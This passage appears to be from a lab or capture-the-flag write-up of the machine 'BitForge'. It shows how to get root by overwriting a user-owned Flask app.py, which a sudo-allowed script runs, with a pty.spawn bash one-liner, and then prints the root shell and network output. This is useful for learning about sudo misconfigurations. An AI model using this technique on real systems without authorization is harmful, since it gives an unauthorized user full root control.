Writable Sudo Flask App
The jack user has sudo privileges to execute the /usr/bin/flask_password_changer command as the root user without getting prompted for password.
/usr/bin/flask_password_changer is a Bash script that starts a Flask application, /opt/password_change_app/app.py that is owned by the jack user.
jack@BitForge:/opt/password_change_app$ mv ./app.py ./app.py.bak
jack@BitForge:/opt/password_change_app$ echo -n 'import pty; pty.spawn("/bin/bash")' > ./app.pyUsing the basic technique, i can overwrite to the app.py file
jack@BitForge:/opt/password_change_app$ sudo -u root /usr/bin/flask_password_changer
root@BitForge:/opt/password_change_app#
root@BitForge:/opt/password_change_app#
root@BitForge:/opt/password_change_app# whoami
root
root@BitForge:/opt/password_change_app# hostname
BitForge
root@BitForge:/opt/password_change_app# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:5a:98 brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.196.186/24 brd 192.168.196.255 scope global ens192
valid_lft forever preferred_lft foreverSystem level compromise